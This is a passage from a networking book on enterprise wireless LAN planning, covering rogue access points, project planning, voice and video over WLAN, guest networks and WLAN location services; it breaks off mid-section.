community, but also enable the design team to consider specific security requirements early. The
engineering team can then craft specific technical solutions and incorporate them into the WLAN's
design. As such, you should develop a good understanding of your proposed wireless security policies
before you commence the wireless LAN design. The architecture is often influenced by the business and
security policies and decisions you define early. Although you will undoubtedly produce finalized and
more detailed policies, guidelines, and procedures during and after the deployment, it is appropriate to
begin planning these important details now.
Dealing with Rogue Access Points

Rogue access points are access points that are located within your enterprise that were not installed by
your IT department or approved vendors. They present a very serious security threat when connected to
your network as they are improperly configured with little or no security settings. The rogue APs create a
backdoor into your intranet by effectively bypassing any IT security barriers you have constructed.
Rogue APs that are not connected to your network are also a challenge. In these circumstances, the
rogue AP installer has not necessarily compromised enterprise security by connecting his personal
access point to the network, but the simple fact that the access point is even powered and transmitting
can have a negative effect on your official WLAN by creating unwanted radio interference.
A method to deal with rogue access points is essential for any enterprise-class WLAN. It is imperative
that you define a rogue AP strategy early, acquire tools to help search and identify rogue APs, and define
policies and procedures on how they will be dealt with by your IT staff.
Define High-Level Program Plan

A project plan is a formal, approved document that is used to guide both project execution and project
control. At this early stage, you do not need a detailed plan, but rather a brief outline. This can be as
simple as a generic Gantt chart with the main project tracks and estimated completion months or
quarters noted. This high-level plan will give you a basic understanding of strategy and timelines.
Chapter 6 provides further detail to assist you in defining a more accurate and elaborate deployment
plan. Once again, it is important to note that the basic guidelines and recommendations contained both
here and in Chapter 6 do not obviate the need for you to undertake your deployment in a methodical
and clearly defined manner, preferably following your own project lifecycle and methodology or one of
the national or international standards.
Estimate Resource Requirements

Asking some basic questions, such as the following, will help you estimate your resource requirements:
Will you use internal IT staff?
Will you outsource the site surveys and deployment?
Do you need to engage project-program-specific contractors?
In turn, the answers to these questions will help you calculate how long the program will take in rough
terms. For example, if you are using your own internal IT staff to carry out the site surveys and
deployment, the number of sites that can be installed concurrently will be less than if you engaged the
professional services of an external vendor. In other words, the more physical resources you have at
your disposal, the quicker the project can proceed.
Estimate Budgetary Requirements

Once you have estimated your resource requirements and defined your deployment strategy along with
the breadth and scope of your deployment (as discussed earlier in the "Preparation" section), you should
be able to calculate a rough program budget cost. This is essential for any large-scale deployment and is
a requirement in defining your business case.
Produce Project/Program Plans

At this stage and with the rough estimates and projections you have defined so far, you should be able
to create a rough program/project plan. This plan should include time and resources required for the
design and implementation phase (as detailed in the PPDIOO lifecycle illustrated earlier in Figure 3-1)
and cover the multiple project tracks, including options such as a pilot deployment, and phased
implementation. You will learn more details in Chapter 6, but at this stage you should be able to produce
a high-level program/project plan for your stakeholders as part of your business case.
Follow Your Internal Project Lifecycle

If your organization is a medium to large enterprise, you likely already have a clearly defined project
lifecycle. As such, any advice here may be superfluous; however, at a minimum, you should do the
following:
Clearly set down milestones and decision points (that is, project plan).
Clearly define your scope.
Clearly define your requirements.
Implement a hierarchical program management team.
- Executive/stakeholder team
- Program team
- Individual project teams
Track changes to scope, deliverables, timelines, schedule, and budget.
Regularly report back to your executive management or program stakeholders.
Summary
In this chapter, you have seen the importance of the opening phases of the PPDIOO solution lifecycle.
Before launching a large project, it is important for you to undertake careful preparation and planning.
This includes clearly defining the stakeholders and executives responsible for the project, the target
users, the target sites, and even the target applications for the WLAN. Defining the funding models and
various high-level technical aspects such as security framework (which is covered in more detail in
Chapter 7) and ensuring that you adopt a scalable architecture all help avoid hurdles during the
important design and implementation phases.
Chapter 4. Supplementary and

Complementary Services
Chapter 2, "Business Considerations" discussed the value of mobility in your organization and provided
frameworks for identifying the specific areas where WLANs can be most beneficial. You learned about the
mobilization of existing applications as well as applications that you can successfully enable and leverage
when a WLAN is deployed.
Chapter 2 did not discuss all applications and services that a WLAN can enable. Although some
applications and services are important in today's business environment, they are not critical for WLANs.
Consider these as "nice-to-haves" instead of "must haves" in your WLAN.
This chapter introduces you to these supporting services. The chapter outlines what the benefits of these
services are, why they are more challenging to make available, and which recommended practices
should be considered for provisioning them.
The services under consideration can roughly be grouped into two sets:
Supplementary WLAN services make use of the transport mechanism provided by WLANs to
provision a higher-order application. Voice and video fall within this category.
Complementary WLAN services extend the availability of the transport system at the device
level. The accessibility of the WLAN is expanded to a larger user community or the WLAN is used
for device-specific procedures. Guest WLAN access and RF location services are examples of
complementary services.
The rationale for layering supplementary services onto your WLAN is that it increases the value of your
WLAN for your user community. The transport medium becomes completely transparent to the user, and
the entire application suite that is available on the wired networks is made available on the wireless
network. The WLAN thus effectively mobilizes all your applications and users.
Regrettably, this mobilization is not always easy to achieve because some applications are substantially
harder to transfer to a WLAN environment. For example, voice and video are real-time and latency
sensitive applications that demand deterministic network transport. Chapter 1, "Introduction to Wireless
LAN Technologies," revealed that WLANs are susceptible to many internal and external influences. The
number of WLAN users, physical obstacles, and other devices that operate in the same frequency band
all have an impact on throughput and latency. As such, it might seem like a dichotomy to plan to deploy
voice and video applications on a WLAN. This chapter shows that this is not the case.
The situation for complementary services is slightly different. Because you will already have deployed a
WLAN, you can extend its application to additional services, thereby increasing the value you derive from
this technology. Many of today's organizations are characterized by a high degree of fluidity in terms of
individuals visiting office locations. Customers, consultants, and temporary staff are all examples of
people who come and go on a daily basis and who could benefit from basic Internet connectivity. Guest
networks become a viable complementary WLAN service for this transient community because it
provides public hotspot-like connectivity. This chapter covers the benefits and challenges related to
supporting guest WLANs.
A final complementary service that this chapter discusses is WLAN location services, which use the WLAN
to determine the physical location of WLAN-connected devices. This chapter concludes by covering some
of the benefits of location services as well as common implementation considerations.
Voice
Voice over IP (VoIP), which enables telephony over an IP infrastructure, is a complex topic in its own
right. Given the importance of VoIP technology, this section explains the basic considerations for
enabling VoIP on your WLAN. Refer to the "Additional Resources" section at the end of this chapter for
books that cover VoIP, which is a communication protocol, and IP telephony, which is a communication
application, in more detail.
Many of the benefits that are found in wired VoIP are directly applicable to wireless VoIP. Strategic
benefits include the enabling of rich-media content integration and distribution. Operational advantages
consist of ease of maintenance and support through consolidation of the PBX infrastructure and avoiding
the need to support an additional technology. Lastly, financial gains can consist of reduced toll-charges
by routing internal calls across the organization's network instead of the public network.
The challenges of enabling telephony over IP are in the IP protocol itself. Basic IP is by design a besteffort protocol. No distinction is made between the types of communication sessions and no guarantees
are made regarding timely delivery of packets. E-mails, web traffic, voice, and video are by default all
treated as equal. IP will only try to deliver the packets, and the handling of dropped packets is left up to
the applications. Therefore, some higher-order mechanism is required to enable more deterministic
behavior of the best-effort protocol. This is the domain of quality of service (QoS). QoS refers to a
collection of tools and techniques for classifying, marking, and providing priority handling of traffic.
Classification of traffic is done based on parameters such as protocols, network addresses, devices,
application types, or even time of day. Marking of Layer 2 frames and Layer 3 packets is then performed
to enable different priority processing of traffic. QoS mechanisms thus effectively engineer the traffic so
that it exhibits a more deterministic behavior. WLANs employ 802.11e, a standard that was ratified by
the IEEE in 2005, to provide Layer 2 QoS enhancements for WLAN applications by augmenting the IEEE
802.11 Media Access Control (MAC) layer.
802.11e provides two different types of enhancements. Both types enable the creation of traffic classes.
However, the granularity with which these classes can be manipulated is slightly different. Enhanced
Distributed Coordination Function (EDCF) is the simpler version of 802.11e and only provides a besteffort QoS. The more complex version, named Hybrid Coordination Function (HCF), offers more granular
configuration possibilities, but has not been widely deployed.
Note that Wireless Multimedia (WMM) is an alternative WLAN QoS standard defined by the WLAN
Alliance. WMM can be considered to be a subset of 802.11e. It was developed while the industry waited
for the IEEE to ratify 802.11e. Now that this ratification has occurred, WMM is less of a consideration for
new deployments. However, it is still a supported technology by many vendors.
Even though many of the VoIP benefits and challenges are shared between wired and wireless LANs,
some challenges are either unique to WLANs or compounded by the nondeterministic behavior of
wireless networks. The following sections focus on these unique challenges by taking a closer look at
WLAN voice devices as well as specific hurdles that must be overcome to enable VoIP on WLANs.
WLAN Voice Devices

Telephony is traditionally associated with dedicated devices. These devices are the handset that you
encounter on desks or mobile telephony handsets. However, the advent of VoIP has made it possible to
convert any general purpose computing device into a telephone. Today, telephones not only come in
hardware, but they also come as software applications. These software versions of phones are
colloquially known as SoftPhones. A SoftPhone application can effectively turn a desktop, laptop, or PDA
into a fully featured telephone. Hence, you should not consider dedicated WLAN telephony handsets as
the only viable alternative for WLAN VoIP.
Various vendors manufacture and sell these WLAN VoIP handsets, and they look and feel like traditional
mobile handsets. The difference is that they use 802.11 instead of analog radio as the transport
mechanism. This is similar to the IP phones that you find on desks which use 802.3 instead of analog
TDM.
To enable consolidation of mobile telephones, several vendors are currently working on dual-mode
handsets. These handsets are capable of interfacing with both WLANs and cellular networks giving users
the option to select the most cost-effective connection. Cellular phones are likely to soon form an
integral part of voice devices that your WLAN needs to support. Figure 4-1 summarizes the many
different types of WLAN voice devices that you can encounter.
Figure 4-1. WLAN Voice Devices
Figure 4-1 shows that WLANs can mobilize voice on devices that traditionally are not considered as
mobile telephony devices. Remain sensitive to this fact and include your strategy for supporting these
devices and telephony in your architecture and design. Chapter 5, "Guidelines for a Successful
Architecture and Design," covers this topic in greater detail.
WLAN Voice Implementation Challenges

The nondeterministic behavior of an IP network can plague the deployment of telephony in the IP
environment. Specifically, latency caused by the nondiscriminating network as well as dropped IP voice
packets can have a significant detrimental impact on voice quality. WLANs compound these challenges in
three ways. The first two are caused by the shared nature of the medium. Not only is available
throughput shared among users, but access to the medium is also granted on a first-come, first-serve
basis. The third challenge relates to the speed with which wireless voice devices can roam from cell to
cell.
Bandwidth and Latency

Whereas bandwidth and latency considerations are important in wired networks, they are critical in
wireless environments. The focus in this case is edge connectivity because backhaul connectivity is
assumed the same irrespective of the wired or wireless connectivity provided to the end user.
The contention that occurs in wired VoIP environments for network access is between different
applications on a client that require network access. The client is connected via a dedicated connection
to an access switch, and applications compete for access to the network. QoS mechanisms can be used
to classify, mark, and provide priority queuing. This alleviates many of the bandwidth and latency
challenges in wired networks.
Unfortunately, this is not the case for WLANs because they share access to the transport medium among
all connected stations. As such, contention for airspace access occurs not only inside of the client, but
also between the clients. Even though a client could provide a higher priority queue for its time-sensitive
applications such as voice (and video), the client must still compete with neighboring clients for airspace
access.
Quality of Service
Because of the aforementioned situation, it is difficult to guarantee timely access to the medium for
voice traffic. 802.11e extends QoS mechanisms to the WLAN Media Access Control (MAC) layer to
increase the probability of gaining access to the network. The simpler method, EDCF, is a "best effort"
QoS method where high priority traffic is given a slightly higher transmission probability than lower
priority traffic.
The more complex type is HCF, which is the 802.11e version that provides features like bandwidth
control, fairness between stations, classes of traffic, jitter management, and so on. As such, WLAN QoS
can be configured with much greater precision with HCF. Even though this method provides more
granularity, it has not been widely implemented yet due to its complexity.
If voice is indeed a critical application for your environment, ensure that both QoS as well as sufficient
bandwidth is provisioned. Avoid situations where many clients are part of the same cell because this will
prevent excessive access contention. Chapter 5 provides strategies for determining the appropriate
number of access points for your environment.
Roaming Clients
A challenge that is unique to WLANs is that of roaming clients. Stations that are on the move transfer
their association from one access point to another. When this transfer occurs, the device must reauthenticate with the authentication, authorization, and accounting (AAA) infrastructure, thereby
introducing a possible momentary interruption in service. This is especially noticeable in voice
applications where any interruption can result in lost packets and a corresponding impact on voice
quality.
WLAN vendors have addressed this by introducing fast Layer 2 roaming, which reduces the time to reauthenticate (usually to less than 100 ms or so) as the station moves its association from one access
point to another. This fast roaming capability limits the disruption of the voice stream as packet loss is
minimized.
An additional challenge caused by roaming occurs when a station crosses an Extended Service Set (ESS)
boundary. When a client transfers its association to an AP in a different ESS, it effectively moves into a
different IP subnet. This is known as Layer 3 roaming, as the client device has moved from one IP
subnet to another. Routing issues arise as the station's old IP address is invalid and VoIP sessions can
terminate under these circumstances. If no additional measures are taken, the active call will be
dropped. Figure 4-2 illustrates the effect of mobile VoIP handsets roaming across ESS boundaries and
the resulting invalid IP address in the new ESS.
Figure 4-2. Limitations in WLAN Layer 3 Roaming

Given that most organizations have far more than a single ESS, roaming with mobile voice devices can
become a significant challenge if not addressed in the architecture. Multisite or campus locations will
have a hard time maintaining voice sessions throughout the campus. Various solutions do exist to
address this roaming challenge, and each has its benefits and challenges. These include Mobile IP
Protocol and "predictive" tunneling solutions. Almost all vendors have moved to some type of tunneling
technology to solve the ESS roaming problem. The tunneling solutions are essentially the same as those
discussed later in this chapter for constructing guest networking solutions. Mobile IP is typically deployed
only in difficult environments such as moving vehicles.
Physical Device Attributes

Voice on WLANs brings along a number of considerations that are not necessarily related to the network,
but rather to the physical attributes of the devices. These considerations include battery life and physical
security of the clients.
Battery life is important no matter what kind of mobile device you use. It is especially significant when
contemplating voice because voice is a real-time form of communication. It is certainly more annoying to
lose an active voice session due to battery power depletion than having your laptop warn you of an
impending shutdown.
As always, remain sensitive to security of the device. As opposed to a laptop or desktop, mobile voiceenabled devices are typically smaller and harder to physically control and secure. Security of mobile
voice devices should not necessarily be thought of in terms of compromise of your network.
Authentication information could indeed be extracted from the device facilitating other attacks. A greater
liability is the information that is stored on the device such as phone books or the ability to make calls
from an active phone, which can result in financial or legal burdens. Use security features such as PIN
codes and policy administration tools to protect access to the devices. For a more in-depth treatise on
security in wireless environments, refer to Chapter 7, "Security and Wireless LANs."
Video
Video is another commonly used application. It is used for broadcasting news, hosting video
conferences, and distributing learning modules. Just like voice, video over IP is a complex and
challenging topic on its own. Therefore, this section does not provide an in-depth technical overview of
all the challenges and solutions that are related to enabling IP video, but instead serves to familiarize
you with key concepts of video as it applies to production enterprise-class WLANs. This section
introduces the different types of video traffic as well as the challenges that are specific to implementing
video in WLAN environments. Refer to the "Additional Resources" section at the end of this chapter for
resources that cover Video over IP in more detail.
Types of Video Traffic

You need to consider the following three parameters when evaluating video over IP-based WLANs:
Distribution mechanism
Timing of the distribution
Quality of the video stream
This section briefly describes each parameter.
Distribution Mechanism
The distribution mechanism refers to the manner in which video is transported across the
communications infrastructure and how stations tune into respective viewing sessions. Generally
speaking, data can be transmitted as broadcast, multicast, or unicast. The differentiation is based on the
number of stations that receive the data, and it is independent of the semantics of the underlying data.
A broadcast transmission sends the data to everybody. Broadcast is one-to-all. In multicast, data is sent
only to stations that have explicitly requested to be sent the data. In this case, the network creates
copies of the transmission when, and only when, different paths are needed to reach the subscribers.
Multicast is thus one-to-many, and its advantage is that it makes more optimal use of network resources
by creating copies of data only when required. Finally, unicast sessions transport data between a single
sender and receiver. Unicast is one-to-one. Figure 4-3 illustrates that unicast is a subset of multicast,
which is a subset of broadcast.
Figure 4-3. Broadcast, Multicast, and Unicast Communications
Timing of the Distribution

Video is an application that permits different timings of transmissions. Users can either retrieve and view
video when they want to, which is known as on-demand viewing, or they can tune into sessions that are
broadcast at predetermined times. This is identical to the options for viewing television. You either tune
into a particular broadcast and subordinate time to content, or you use on-demand to view programs
when it is most convenient for you, in which case you subordinate content to time.
Real-time streaming video applications typically use multicast because it is a more efficient distribution
mechanism. Viewers subscribe to a particular stream, and the network ensures that only the relevant
streams are branched to subscribed viewers. In this manner, redundant copies of the video streams are
avoided. Streaming video is, therefore, ideal for distributing the same information to a large numbers of
viewers at predetermined times. Company meetings or earnings updates are prime examples.
On-demand video is retrieved at the discretion of the viewer. These types of video applications employ
unicast transport for distribution because the probability that multiple viewers would retrieve exactly the
same content at exactly the same time is extremely low. Examples of content that is ideally suited for
on-demand are online education modules or archived videos.
Quality of the Video Stream

A third distinguishing factor in video is the quality of the video. Video is a data-intensive application that
not only needs to send image data, but also audio information. Video formats such as MPEG-4 and AVI
attempt to reduce the volume of data by compressing the stream before storage or transmission, and
decompressing the information during playback. However, even with this compression, video remains
data intensive.
A strategy for easing the burden of video on communications networks is to make the same content
available in different degrees of quality. Image size and quality can be tailored to best match the
available bandwidth. Users can be presented with the choice between a high-bandwidth or lowbandwidth stream to try to ensure a more consistent video experience.
WLAN Video Implementation Challenges

Many of the considerations that are true for voice are directly applicable to video. Video too is sensitive
to network latency, and appropriate QoS measures should be implemented to construct a more
deterministic network environment. Video, however, is more challenging than voice because it
compounds some of the challenges that are encountered with VoIP.
Quality of Service
Not only is video much more data intensive than voice, but it is also truly continuous in nature. Voice
communications typically have some breaks as people pause between sentences to take a breath. This is
not the case for video. As such, limiting latency and jitter is critical. Use QoS classification, marking,
queuing, and traffic engineering techniques to ensure that video is given preferential treatment over less
time-sensitive information but avoid scenarios in which video could drown out all other communication.
Remain sensitive to the fact that video is usually less mission critical than voice. Make use of a tiered
classification and marking strategy for applications. Assign network control traffic the highest priority.
Follow it with voice, then video, and finally best-effort data traffic. Note that this classification scheme is
highly simplified and that you should use more granular tiers if this better suits your needs.
Broadcast Transmission Medium

Another challenge that you face when porting video applications to WLANs is that all video sessions
automatically become broadcast communications. This is irrespective of whether the sessions were
originally broadcast, multicast, or unicast. The reason is found in the nature of RF communications. As is
the case for any communication, access points broadcast data across the airwaves to all attached
stations. Even though a single station might be tuned into the video stream, all stations receive the
video data. Stations that are not tuned in will disregard the video data. Not only does this force the
clients to perform redundant work, but it also ties up the airwaves.
Conversely, the broadcast nature of WLANs can work to your advantage as well. Because broadcast is a
superset of multicast communication, WLANs are ideally suited for multicast video sessions. Clients need
only to not disregard the video data that is broadcasted from the access points to subscribe to a
particular session. However, there is a particular problem with multicast and WLANs. Because all stations
have to be able to receive the multicast stream, the network has to enter a "lowest common
denominator" mode. For example, if a single station operates at 1 Mbps, even if all others are operating
at 54 Mbps, all multicast traffic will be transmitted at 1 Mbps.
Because video is a data-intensive application, the broadcasting thereof can lead to a significant increase
in medium access contention. Carefully plan the architecture and design of your WLAN if you intend to
support video. Pay considerable attention to bandwidth capacity planning and client-to-access point
ratios. Chapter 5 provides recommended strategies and tactics for tackling this challenge.
Managing User Expectations

A final consideration in enabling video applications on WLANs is setting the correct user expectations.
QoS is not a substitute for bandwidth, and it is also not the saving grace for a multi-access medium such
as WLANs. Video is ultimately best served by dedicated high-bandwidth connections. This is especially
true for videoconferencing applications that tie together audio, video, and web applications.
Videoconferencing is not as forgiving as some other video types and also doesn't offer the ability to
make efficient use of bandwidth. Set the proper expectations with the user. Emphasize that the
capability of the WLAN should not be compared to the current capabilities of the wired network,
especially with regard to multimedia applications.
Guest Networking
Guest networking is a term used to describe the provision of network access to nonemployees where
connectivity is usually limited to Internet access. Guest networks are typically considered and
implemented as logical external networks. They avoid the need for visitors such as customers,
contractors, and external vendors to access your native enterprise network to obtain Internet
connectivity. Conceptually, guest networks are very similar to public hotspots, like those commonly
found in airports, cafes, and hotels. The main difference is that the users of enterprise guest networks
are usually not charged for access.
Note
Although it is not strictly required, guest networks are most commonly wireless in nature.
Guest networks could be implemented as wired networks and integrated into the existing wired
network. However, this is a much more complex endeavor than configuring WLANs to provide
a guest networking service.
The key questions that you need to answer when considering guest networks are
Why should you deploy guest networks?
What components are required for deploying them?
How should you implement guest networks?
The following sections tackle these questions by discussing the business rationale for providing guest
networking capabilities, the components that are required to enable the service, and finally, the main
implementation considerations for deploying WLAN guest networks.
Business Rationale for Enabling Guest Networking

Before deciding to implement guest networks, you should validate the business drivers for providing this
complementary service in your environment. The value proposition of wireless guest networks is not
necessarily the same as the rationale for deploying WLANs in general because it is usually related to one
of the following considerations:
Business agility
Security
Liability protection
The following sections explore each of these considerations in more detail.
Business Agility
Guest networking is made available to nonemployees as an amenity. By ensuring your users can access
the Internet, you improve their experience when at your site. This can be important in industries that
have a high degree of public interaction or organizations that have many visitors.
A guest portal is often used, so the visitor is greeted with a Web page when they first use the service.
Typically, this will include a welcome page, perhaps a legal disclaimer, and maybe an authorization or
check box for them to acknowledge.
After guests successfully obtain Internet access, they can use their own remote access solution to
connect to their corporate infrastructure. Guests thus effectively extend their organization's Intranet to
your own site making their full suite of productivity applications available to them. For example, they can
download their e-mail, browse their internal website, and retrieve voicemail.
A particularly useful application of guest networks can be found in product demonstrations. When a sales
representative visits your office, he can access all applications and information that would be available to
him if he were at his own corporate offices. As such, a full-featured demonstration can be delivered
without being encumbered by the potential unavailability of tools and data.
Security
Many enterprises do not allow nonemployees to access the network. This simple security policy avoids
the risk associated with visitors introducing viruses to the network, snooping, hacking, and other
undesirable activity. However, visitors can benefit from Internet connectivity to gain access to their own
enterprise networks (to check e-mail, access files, and so on). A policy decision to altogether prohibit
access therefore negatively impacts the productivity of your visitors.
A guest networking solution addresses this conflict. You can provide visitors, contractors, and vendors
access to the Internet, while avoiding the ability to access your enterprise network. Guest traffic is
separated and tunneled securely on your network and to the Internet; thus creating an isolated and
secure environment for your visitors to work in.
Legal Liability Protection

Internet traffic can typically be tracked to its source. Therefore, all Internet traffic that originates from
an enterprise can easily be identified as having come from that enterprise's network. Employees usually
sign an acceptable use policy when hired. They agree not to undertake malicious or illegal behavior, such
as hacking or deliberately spreading viruses. However, guests are not required to sign such employee
agreements.
Protect yourself from legal liability by implementing a portal in which users need to read and explicitly
accept a policy for acceptable use prior to connecting to your wireless guest network. In the unfortunate
case of a crime or unacceptable behavior, you can audit records, identify the offending guest, and take
appropriate action.
Components of Guest Networking

A guest network imposes two distinct requirements:
The guest network must somehow uniquely identify itself This is achieved in guest WLANs
by using a dedicated Service Set Identifier (SSID).
Guest traffic must be transported to and from the Internet in an isolated and secure
fashion This is done by using IP tunneling protocols to create virtual conduits between the access
point and the Internet.
A dedicated guest SSID is created on the same access point that services the enterprise WLAN to
produce a separate Layer 2 network. The benefit of adding an additional SSID is that it avoids the need
to purchase, deploy, and support additional access points. The incremental guest WLAN SSID thus
uniquely identifies the virtual WLAN that is dedicated to guest traffic. This not only makes the separation
of guest and production traffic possible, but it also enables the definition of different association and
authentication policies for your guests and regular users.
Configure your guest SSIDs with "OPEN" authentication and no encryption to provide open access in the
same manner as public hotspots. This essentially permits any laptop to associate with the AP.
Furthermore, configure the access points to broadcast the SSID so that the guest SSID can readily be
discovered by any station that wants to attach to the guest network. Figure 4-4 illustrates how a
dedicated guest SSID creates a virtual WLAN that is separate from the WLAN that is identified by the
enterprise SSID.
Figure 4-4. Enterprise and Guest SSIDs on the Same Access Point
Note
The broadcasting of SSIDs for the enterprise WLAN is discouraged for security reasons
because it makes the identification of the SSID more difficult and lowers the risk of accidental
or malicious association.
These steps ensure that all visitors can locate and associate with the SSID, and use the guest
networking service, without having to resort to substantial configuration changes on their laptop. WLAN
client software can be used to select the same public WLAN profile that is applied to access public
hotspots.
The second requirement is to transport all guest traffic in an isolated and secure manner from the access
point to the Internet. Tunneling protocols such as LWAPP, GRE, or IPsec provide an efficient mechanism
for performing this task. The protocols erect virtual conduits between the access point and the Internet
gateway through which all guest traffic must pass.
This is essentially identical to the use of VPN tunnels to provide secure remote access to the enterprise
network across the Internet. The minor difference in the case of guest WLANs is that the tunnels cross
the private intranet versus the public Internet in the case of VPN remote access. The principal, however,
is identical. Tunneling traffic isolates it from the rest of the network and provides a secure path to the
destination.
Note that even though guest WLAN traffic traverses the same physical infrastructure of the enterprise
network, it is entirely separated on a logical basis. Although the same access points, switches, and
routers are used to transport data, for all intents and purposes the guest network is a completely
separate network. Figure 4-5 shows the physical configuration of a WLAN that is tunneling guest traffic
onto the Internet. Figure 4-6 shows the corresponding logical configuration of the same network;
highlighting the fact that the guest network appears as a logically separated entity.
Figure 4-5. Physical Topology of Guest Networking Solution
Figure 4-6. Logical Topology of Guest Networking Solution
Guest WLAN capabilities can be provisioned in different ways. Many WLAN vendors provide equipment
with "built in" support for guest networking capabilities. The WLAN gear can be configured to create the
SSID, the tunnels, and even a guest portal. For example, these features are offered in the centralized
WLAN controller-based solution from Cisco Systems.
Alternatively, you can purchase dedicated equipment that is specifically designed to provision guest
services. These network appliances are usually placed in a centralized location in your network and
provide guest networking services to several buildings, often along with additional security capabilities.
Finally, it is possible to engineer a solution using the capabilities of your switches and routers. This last
option is not recommended because it does not scale well and requires significant technical expertise to
implement and maintain correctly.
Guest Networking Implementation Considerations

Several topics should be considered before implementing guest networking. Whereas this service can
add significant value, it also introduces additional complexity to the WLAN. Some of the issues you
should consider before implementation include the following:
Guest portal
Legal disclaimers and acceptable use policies
Ease of use
Support
Logging and auditing
The next sections describe each of these in greater detail.
Guest Portal
Develop a guest portal to be the public face of your guest network. Make it aesthetically pleasing;
include your corporate identity; and, depending upon your security policy, require the guest user to
record their name, acknowledge a legal disclaimer, or sign an acceptable use policy.
Legal Disclaimers and Acceptable Use Policies

Include a legal disclaimer with your guest network. You should engage independent legal counsel to
ensure that the disclaimer conforms with local legislation and that you are protecting your enterprise
from any legal liability that might accrue from misuse by your guests. Display the acceptable use policy
on the guest portal and require that guests agree to comply with the policy prior to granting access to
the Internet. Having users select an I Accept box or type their name into a Signature field works well for
this purpose.
Ease of Use
Make the guest networking solution easy to use. When providing guests with access to a guest network,
you should not require specific software or configuration changes to their laptops.
Implement the guest networking solution with its own SSID configured with OPEN authentication and no
security settings. Ensure that the SSID is broadcast. Because the guest network is logically isolated from
your enterprise network, and only provides access to the Internet, this should not present any security
concerns. As always, ensure that your Information Security department review and approve your design
prior to making it available to visitors.
Support
Minimize the support burden of your guest networking solution. Because the users will primarily be
guests, you do not want to expend operational cycles on supporting them. Keep the system easy to use
and produce some basic guidelines for your guests to lighten the support burden. Frequently Asked
Questions (FAQ) sheets can be produced that tell the guest what SSID to use, how to navigate the guest
portal, and to help with basic connectivity troubleshooting.
Logging and Auditing

Log the activity of your guest users. Your enterprise might already log Internet activity by your own
staff, which should make it easier if you decide to log guests also. At the minimum, keep records of the
number of sessions, the identity and IP address of the guest users, and the time and date of their
session.
WLAN Location Services

The term location-based services (LBS) is sometimes used interchangeably with WLAN location services,
but LBS more correctly denote services that provide the user with information about the physical
location of the client device. Conversely, WLAN location services provide telemetry information on WLAN
devices. This information is used by many applications to provide visibility of mobile devices, asset
location and tracking information, inventory and supply chain management support, presence data,
Emergency 911 (E911) event triggers, and many others.
Note
The term LBS is also used in cellular telephone networks to denote services offered to
subscribers. For example, cellular phone users might receive a Simple Message Service (SMS)
message notifying them of sales or special offers in retail stores nearby. However, in the
context of this chapter, this discussion focuses on LBS and WLAN location services as they
relate to 802.11-based wireless networks only.
With a robust LBS solution, an organization can easily answer questions such as the following:
What do I have?
How much of it do I have?
Where is it?
What is its status?
The following sections demonstrate why the capability to answer the aforementioned questions is
valuable for various industries and provide an overview of technical considerations that need to be made
when deploying LBS capabilities.
Business Rationale for WLAN Location Services

WLAN location services incorporate location information with pertinent content to provide incremental
value to a user. In essence timely and accurate information on the whereabouts and status of an entity
is used to provide a more relevant service. These services are typically classified into three families, as
follows:
Tracking services These services provide the location and utilization information to optimize
processes in workforce, and asset and logistics management. For example, tracking services can
reduce duplication and accelerate logistics in inventory management.
Information services These services use location data to identify which information is most
relevant for a specific position. For example, different maps might be presented to you depending
on your whereabouts. LBS can be integrated into mobile resource management solutions (MRM)
that target mobile workforce productivity.
Safety and security services These services rely on location information to provide safety and
security enhancements. For example, the whereabouts of children in theme parks can be tracked
by providing them with active wristbands.
The location information can be of significant benefit in multiple industries by enabling otherwise
difficult-to-realize efficiencies. The following sections take a closer look at how various industries are
using these location services.
Healthcare
Hospitals spend millions of dollars on the latest technology to provide the best level of care to their
patients. This often results in the use of very expensive, but mobile, assets, such as electronic and
automated IV pumps, vital signs monitors, and even gurneys. Not only can the loss or misplacement of
these devices create a financial burden for the hospital, but the lack of the device can also prohibit
timely patient care. The ability to track, locate, and recover these mobile assets is, therefore, absolutely
critical for the hospital or health center.
Some hospitals combine WLAN voice with location services. This allows hospital staff to carry WLANbased VoIP handsets that include a "panic button" or key-code that, when pressed, will page all
appropriate staff that are located nearby.
In some instances, patients themselves have been provided with location tags. The WLAN can then be
used to locate the patient, and even provide an automatic link to the patient information system. The
synergy of an existing WLAN infrastructure, location services, WLAN voice, and back-end hospital
systems thus enables a faster response time and improved patient care.
Manufacturing
Location services can offer improved business knowledge by automating and simplifying supply chain
management. The ability to identify exactly how many items are in production, where they are located in
the assembly line, and the current rate of manufacture is critical for operations managers who rely on
timely and accurate information to finely tune the production process. Intimate knowledge of the goods
and their whereabouts is, therefore, essential.
Location services can also be used by robotic delivery mechanisms and warehousing vehicles to
automatically store and retrieve equipment, and monitor stock levels in real time. The use of a WLANbased solution avoids the enterprise from having to deploy a proprietary, nonstandard RFID solution
instead.
Entertainment and Leisure
Personal security for customers is very important in the entertainment and leisure industries. In Europe,
some theme parks have used WLAN location services to provide an online, active, and real-time
positioning solution for visitors to track the location of children. Children are provided with active location
tags embedded in wristbands or name badges. This provides additional safeguards for security staff and
park management, and peace of mind for parents.
Logistics
The most common logistics operation performed with handheld wireless devices is inventory taking.
Almost every large retail chain and distribution center use some type of wireless network to assist with
the mundane, but necessary, task of counting things.
WLAN location services can provide incremental value in these environments by providing online, active,
and real-time information on asset location. In the car rental business, identifying whether vehicles have
been returned and whether they are in the garage, workshop, or cleaning bay improves the response
time and productivity of the business. The business can improve its operating margins by ensuring quick
turnaround of its vehicles.
Transport and Shipping

Transport and shipping companies are in the business of timely delivery of packages on time. This is
only possible by ensuring that distribution and dispatch centers operate smoothly, accurately, and
expeditiously. Location services assist in this by making sure that pallets and crates can be tracked and
identified accurately. By attaching asset tags to the pallets and crates, the transport and shipping
business can guarantee that the data provided to its back-office system is accurate.
Components of WLAN Location Services

WLAN location services are usually provided by leveraging the existing infrastructure to provide
information on the location of 802.11 client devices. These devices not only include standard wireless
network client devices (laptops, PDAs, WLAN phones, and so on), but also asset or location tags.
Note
WLAN asset or location tags are small devices about the size of a box of matches. They contain
a battery and an 802.11 transmitter that regularly transmits beacons. The beacons are
received by the access points and interpreted by location service applications.
There are three ways location can be calculated, each with increasing accuracy. The options are
identifying the closest access point, using RF triangulation to determine an approximate position, or
making use of RF fingerprinting to pinpoint the exact location. Use the method that gives you the desired
degree accuracy:
Closest AP This method is the simplest way to identify location, but it is also the least accurate.
The WLAN location service queries the access points to determine where a particular client is
associated or which AP reports the strongest signal. While this gives general location information,
the accuracy is limited to the size of the radio cell.
RF triangulation This method is considerably more accurate than the closest AP method. In this
scheme, signal strength readings are reported from the access points that detect the location tag
